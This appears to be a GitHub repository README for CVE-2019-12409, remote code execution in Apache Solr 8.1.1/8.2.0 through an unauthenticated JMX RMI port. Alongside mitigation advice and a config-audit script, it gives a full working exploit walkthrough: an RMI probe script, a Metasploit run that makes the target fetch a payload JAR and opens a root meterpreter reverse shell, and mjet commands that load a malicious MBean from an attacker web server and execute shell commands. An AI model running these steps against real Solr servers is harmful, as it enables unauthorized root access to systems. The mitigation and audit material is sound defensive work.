• Stars: 103
• Rank: 333,046 (Top 7 %)
• Language: Python
• Created: almost 5 years ago
• Updated: over 1 year ago


Repository Details

Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS="true")

CVE-2019-12409 Apache Solr RCE

Apache Solr 8.1.1 and 8.2.0 (Linux packages; the Windows solr.in.cmd is not affected) ship a default bin/solr.in.sh with ENABLE_REMOTE_JMX_OPTS="true". When that is set, bin/solr starts the JVM with the JMX RMI connector listening on RMI_PORT (18983 by default) with jmxremote.authenticate=false and jmxremote.ssl=false. Anyone who can reach that port can register a javax.management.loading.MLet MBean and have the Solr JVM fetch and execute a JAR from an attacker-controlled web server, which is exactly what the Metasploit module and mjet below do, running as the user Solr runs as (root in this lab).

Mitigation: set ENABLE_REMOTE_JMX_OPTS="false" in the effective solr.in.sh on every node (it may live in /etc/default/ depending on the install), restart Solr, and confirm that no com.sun.management.jmxremote* properties appear under "Java Properties" in the Solr Admin UI; 8.3.0 ships the corrected default. Keep the RMI port off untrusted networks regardless.

The vulnerable setting in this lab's solr.in.sh:

root@kali:/opt/solr-8.1.1/bin# cat solr.in.sh |grep true
# Set to true to activate the JMX RMI connector to allow remote JMX client applications
ENABLE_REMOTE_JMX_OPTS="true"
#SOLR_OPTS="$SOLR_OPTS -Dsolr.clustering.enabled=true"
# Enables log rotation before starting Solr. Setting SOLR_LOG_PRESTART_ROTATION=true will let Solr take care of pre
# Enables HTTPS. It is implictly true if you set SOLR_SSL_KEY_STORE. Use this config
#SOLR_SSL_ENABLED=true
#SOLR_SSL_CHECK_PEER_NAME=true
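The grep above only shows lines containing "true"; an audit should parse the file the way the shell will. The script below is an added example (not part of this repository or of Solr): it reads a solr.in.sh, ignores commented lines, honours later overrides, derives the effective RMI port, reports whether the unauthenticated JMX connector will be started, and emits a hardened copy with the setting forced to "false". The sample file content is constructed for the example; the SOLR_PORT+10000 fallback for RMI_PORT is an assumption that matches the 18983 seen on this page for the default Solr port 8983.

```python
import re

# Constructed sample: the JMX-relevant lines of a Solr 8.1.1 bin/solr.in.sh
# (the ENABLE_REMOTE_JMX_OPTS line is the one shown above); not the full file.
SAMPLE_SOLR_IN_SH = """\
# Set to true to activate the JMX RMI connector to allow remote JMX client applications
ENABLE_REMOTE_JMX_OPTS="true"
# The RMI port; bin/solr derives it from SOLR_PORT when unset
#RMI_PORT=18983
#SOLR_PORT=8983
#SOLR_OPTS="$SOLR_OPTS -Dsolr.clustering.enabled=true"
#SOLR_SSL_ENABLED=true
"""

DEFAULT_SOLR_PORT = 8983
# Assumption: bin/solr uses SOLR_PORT + 10000 when RMI_PORT is unset (8983 -> 18983).
RMI_PORT_OFFSET = 10000

_ASSIGN = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*?)\s*$")
# Only active (uncommented) assignments; [ \t]* so a multiline sub never eats blank lines.
_ENABLE_LINE = re.compile(r"^[ \t]*(?:export[ \t]+)?ENABLE_REMOTE_JMX_OPTS=.*$", re.M)


def parse_solr_in_sh(text):
    """Return {NAME: value} for the active NAME=value lines, with one layer of quotes removed.

    Later assignments override earlier ones, as they do when the shell sources the file.
    """
    settings = {}
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = _ASSIGN.match(line)
        if not m:
            continue
        name, value = m.groups()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        settings[name] = value
    return settings


def _as_int(value, default):
    try:
        return int(value)
    except (TypeError, ValueError):  # unset, or something like "$SOME_VAR" we cannot expand
        return default


def audit_jmx_exposure(text):
    """Decide whether this solr.in.sh makes bin/solr start the unauthenticated JMX RMI connector."""
    s = parse_solr_in_sh(text)
    enabled = s.get("ENABLE_REMOTE_JMX_OPTS", "false").strip().lower() == "true"
    solr_port = _as_int(s.get("SOLR_PORT"), DEFAULT_SOLR_PORT)
    rmi_port = _as_int(s.get("RMI_PORT"), solr_port + RMI_PORT_OFFSET)
    findings = []
    if enabled:
        findings.append(
            "ENABLE_REMOTE_JMX_OPTS=true: JMX RMI connector will listen on port "
            f"{rmi_port} with jmxremote.authenticate=false and jmxremote.ssl=false"
        )
    return {"jmx_enabled": enabled, "rmi_port": rmi_port, "findings": findings}


def harden(text):
    """Return the file with every active ENABLE_REMOTE_JMX_OPTS assignment forced to false."""
    if not _ENABLE_LINE.search(text):
        return text.rstrip("\n") + '\nENABLE_REMOTE_JMX_OPTS="false"\n'
    return _ENABLE_LINE.sub('ENABLE_REMOTE_JMX_OPTS="false"', text)


if __name__ == "__main__":
    import sys
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SOLR_IN_SH
    report = audit_jmx_exposure(src)
    for f in report["findings"]:
        print("[!]", f)
    if not report["jmx_enabled"]:
        print("[+] remote JMX disabled")
```

Run it as `python audit_solr_jmx.py /opt/solr-8.1.1/bin/solr.in.sh`; the hardened text from harden() can be written back once you have confirmed nothing else (for example a monitoring agent) relies on the connector.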

nmap scan info

root@kali:/opt/mjet# nmap -p 18983 -Pn -T5 -n -sC -sV 10.10.20.166
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-19 17:00 CST
Nmap scan report for 10.10.20.166
Host is up (0.00016s latency).

PORT      STATE SERVICE  VERSION
18983/tcp open  java-rmi Java RMI
| rmi-dumpregistry: 
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|     @127.0.1.1:18983
|     extends
|       java.rmi.server.RemoteStub
|       extends
|_        java.rmi.server.RemoteObject

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds
root@kali:/opt/mjet# 
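Two things in that scan matter for what follows. First, the registry binds the name jmxrmi, so this is a JMX connector rather than some other RMI service. Second, the stub it hands out points at 127.0.1.1:18983 (Debian's hostname alias) because java.rmi.server.hostname is not set; in this lab attacker and target are the same kali box, so a client that follows the stub still lands on the right JVM, but against a remote host a client that follows the advertised address blindly connects to the wrong place.

The script below is an added example, not code from this repository or from mjet: it performs only the Java RMI transport handshake (the JRMI magic, version 2, stream protocol, then the server's ProtocolAck carrying the client endpoint as the server sees it), which is enough to confirm that a port speaks RMI before you point a JMX tool at it. Confirming that the registry actually binds "jmxrmi" needs a serialized registry lookup, which nmap's rmi-dumpregistry already does. The fake endpoint is a constructed stand-in for the test; nothing here touches the network beyond the host and port you give it.

```python
import socket
import struct
import threading

JRMI_MAGIC = b"JRMI"
JRMI_VERSION = 2
STREAM_PROTOCOL = 0x4B  # client proposes the plain stream protocol
PROTOCOL_ACK = 0x4E     # server accepts
PROTOCOL_NACK = 0x4F    # server refuses


def _read_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during RMI handshake")
        buf += chunk
    return buf


def _read_utf(sock):
    """Java DataInput.readUTF: 2-byte big-endian length followed by (modified) UTF-8."""
    (length,) = struct.unpack(">H", _read_exact(sock, 2))
    return _read_exact(sock, length).decode("utf-8", "replace")


def probe_java_rmi(host, port, timeout=5.0):
    """Complete the JRMI stream handshake with host:port.

    Returns {"rmi": True, "client_seen_as": (host, port)} when the peer answers with
    ProtocolAck, or None when it refuses, speaks something else, or is unreachable.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(JRMI_MAGIC + struct.pack(">HB", JRMI_VERSION, STREAM_PROTOCOL))
            ack = _read_exact(sock, 1)[0]
            if ack != PROTOCOL_ACK:
                return None
            seen_host = _read_utf(sock)            # our address as the server sees it
            (seen_port,) = struct.unpack(">i", _read_exact(sock, 4))
            # Finish the handshake with an (arbitrary) endpoint identity of our own.
            ident = b"0.0.0.0"
            sock.sendall(struct.pack(">H", len(ident)) + ident + struct.pack(">i", 0))
            return {"rmi": True, "client_seen_as": (seen_host, seen_port)}
    except (socket.timeout, ConnectionError):
        return None


def start_fake_rmi_endpoint(accept=True):
    """Constructed stand-in for a JVM RMI transport on 127.0.0.1; answers one handshake.

    Returns the port it listens on. Not a real registry: it never serves lookups.
    """
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(10)
    port = srv.getsockname()[1]

    def serve():
        try:
            conn, addr = srv.accept()
            with conn, srv:
                hdr = _read_exact(conn, 7)
                ok = hdr[:4] == JRMI_MAGIC and hdr[4:6] == b"\x00\x02" and hdr[6] == STREAM_PROTOCOL
                if not (ok and accept):
                    conn.sendall(bytes([PROTOCOL_NACK]))
                    return
                h = addr[0].encode()
                conn.sendall(bytes([PROTOCOL_ACK]) + struct.pack(">H", len(h)) + h
                             + struct.pack(">i", addr[1]))
                _read_utf(conn)          # client's endpoint identity
                _read_exact(conn, 4)
        except OSError:
            pass

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    tport = int(sys.argv[2]) if len(sys.argv) > 2 else 18983
    print(probe_java_rmi(target, tport))
```

Use it as `python rmi_probe.py 10.10.20.166 18983`; a non-None result means the port is a Java RMI transport and the tools in the next two sections are worth trying. The echoed client address is also a cheap way to learn which interface the target sees you on, which matters when you need the target JVM to fetch the payload JAR from your web server.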

0x01 Using Metasploit (exploit/multi/misc/java_jmx_server)

The module connects to the registry, registers an MLet MBean, and points it at an MLET document on the module's own HTTP server (SRVHOST/SRVPORT), from which the target JVM fetches the payload JAR; no JMX credentials are needed here, so JMX_ROLE and JMX_PASSWORD stay empty. Attacker and target are the same kali host in this lab, which is why LHOST equals RHOSTS below.

msf5 exploit(multi/misc/java_jmx_server) > show options 

Module options (exploit/multi/misc/java_jmx_server):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
   JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
   JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
   RHOSTS        10.10.20.166     yes       The target address range or CIDR identifier
   RPORT         18983            yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.20.166     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf5 exploit(multi/misc/java_jmx_server) > run

[*] Started reverse TCP handler on 10.10.20.166:4444 
[*] 10.10.20.166:18983 - Using URL: http://0.0.0.0:8080/2kDic5
[*] 10.10.20.166:18983 - Local IP: http://10.10.20.166:8080/2kDic5
[*] 10.10.20.166:18983 - Sending RMI Header...
[*] 10.10.20.166:18983 - Discovering the JMXRMI endpoint...
[+] 10.10.20.166:18983 - JMXRMI endpoint on 127.0.1.1:18983
[*] 10.10.20.166:18983 - Proceeding with handshake...
[+] 10.10.20.166:18983 - Handshake with JMX MBean server on 127.0.1.1:18983
[*] 10.10.20.166:18983 - Loading payload...
[*] 10.10.20.166:18983 - Replied to request for mlet
[*] 10.10.20.166:18983 - Replied to request for payload JAR
[*] 10.10.20.166:18983 - Executing payload...
[*] Sending stage (53845 bytes) to 10.10.20.166
[*] Meterpreter session 2 opened (10.10.20.166:4444 -> 10.10.20.166:48474) at 2019-11-19 16:39:49 +0800

meterpreter > sysinfo
Computer    : kali
OS          : Linux 4.19.0-kali1-amd64 (amd64)
Meterpreter : java/linux
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/opt/solr-8.1.1/server
ls
contexts
etc
lib
logs
modules
README.txt
resources
scripts
solr
solr-webapp
start.jar
exit
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/misc/java_jmx_server) > 

0x02 Using mjet (MOGWAI LABS JMX Exploitation Toolkit)

Usage (mjet is run under Jython). The install step starts a web server on the given port, serves the MLet descriptor and the payload JAR from it, and registers the payload MBean in the target JVM; the command step invokes that MBean. The HTTP URL must be one the target JVM can reach, since the target, not the attacker, fetches the JAR. super_secret is the secret the installed MBean expects on later command calls, so that the implanted MBean cannot be driven by anyone else who finds the port:

java -jar jython-standalone-2.7.0.jar mjet.py 10.10.20.166 18983 install super_secret http://10.10.20.166:8000/ 8000

java -jar jython-standalone-2.7.0.jar mjet.py 127.0.0.1 18983 command super_secret "id&&pwd&&ls"

MLet descriptor served by the install step (code is the MBean class, archive the JAR to load, codebase where the JVM fetches it from):

<html>
<mlet code="de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload" archive="qgmncrbu.jar" name="MogwaiLabs:name=payload,id=1" codebase="http://10.10.20.166:8000/">
</mlet>
</html>

Attack example (the "Object instance already existed" line shows the MBean had already been installed by an earlier run; mjet then reuses it):

root@kali:/opt/mjet# java -jar jython-standalone-2.7.0.jar mjet.py 10.10.20.166 18983 install super_secret http://10.10.20.166:8000/ 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.10.20.166:18983/jmxrmi
[+] Connected: rmi://127.0.0.1  18
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://10.10.20.166:8000/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
<html><mlet code="de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload" archive="qgmncrbu.jar" name="MogwaiLabs:name=payload,id=1" codebase="http://10.10.20.166:8000/"></mlet></html>
10.10.20.166 - - [19/Nov/2019 03:39:17] "GET / HTTP/1.1" 200 -
[+] Object instance already existed, no need to install it a second time
[+] Done
root@kali:/opt/mjet# java -jar jython-standalone-2.7.0.jar mjet.py 127.0.0.1 18983 command super_secret "id&&pwd&&ls"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://127.0.0.1:18983/jmxrmi
[+] Connected: rmi://127.0.0.1  19
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: id&&pwd&&ls
uid=0(root) gid=0(root) groups=0(root)
/opt/solr-8.1.1/server
contexts
etc
lib
logs
modules
README.txt
resources
scripts
solr
solr-webapp
start.jar


[+] Done
root@kali:/opt/mjet# 

References:

https://mogwailabs.de/blog/2019/04/attacking-rmi-based-jmx-services/

https://www.rapid7.com/db/modules/exploit/multi/misc/java_jmx_server

https://github.com/mogwailabs/mjet
